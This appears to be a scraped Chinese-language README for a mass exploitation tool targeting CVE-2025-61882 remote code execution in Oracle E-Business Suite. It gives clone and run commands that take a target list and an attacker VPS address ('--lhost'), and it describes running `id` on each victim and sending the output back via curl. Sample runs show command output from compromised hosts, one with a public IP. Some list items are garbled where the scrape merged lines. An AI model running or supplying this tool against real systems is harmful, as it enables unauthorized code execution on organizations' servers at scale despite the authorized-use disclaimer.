一个快速、多线程的批量扫描器,用于检测 Oracle E-Business Suite 安装中的 CVE-2025-61882。该严重漏洞允许未经身份验证的远程代码执行。
id 命令并解析输出来验证 RCEvuln-output.txtpip install requests
仅此而已。只需 Python 3.7+ 和 requests 库。
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10
创建一个 targets.txt 文件,每行一个 URL:
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
╔═══════════════════════════════════════════════════════════════╗
║ Oracle E-Business Suite RCE 扫描器 (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] 从文件加载了 1235 个目标
[*] 使用 20 个并发线程运行
[*] 易受攻击的主机将保存到 vuln-output.txt
[*] [1/1235] 正在检查 https://target1.com:443 端口 7893
[*] [2/1235] 正在检查 https://target2.com:443 端口 5882
[+] 发现目标! 129.146.56.43 存在漏洞
[+] 命令输出: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] 扫描在 245.67 秒内完成
[*] 发现 3 个易受攻击的目标
[*] 查看 vuln-output.txt 获取完整结果
=================================================================
[+] 发现的易受攻击目标:
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
结果保存到 vuln-output.txt:
# Oracle EBS CVE-2025-61882 - 扫描结果
# 开始时间: Tue Oct 07 15:30:45 2025
# 目标总数: 1235
# 扫描器作者: Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
id 命令并通过 curl 将输出发送回来uid=...gid=... 模式来验证 RCE 是否成功此工具仅用于授权的安全测试。请始终:
未经授权访问计算机系统是违法的。
发现 bug?有功能请求?
git checkout -b feature/amazing-feature)git commit -m 'Add some feature')git push origin feature/amazing-feature)本项目采用 MIT 许可证授权 - 详情请参阅 LICENSE 文件。
此工具仅供教育和授权安全测试目的使用。作者不对因使用此工具造成的任何滥用或损害负责。使用风险自负。
| 参数 | 必需 | 默认值 | 描述 |
|---|
--targets | 是 | - | 包含目标 URL 的文件路径 |
--lhost | 是 | - | 您的 VPS/攻击者 IP 地址 |
--threads | 否 | 20 | 并发线程数 |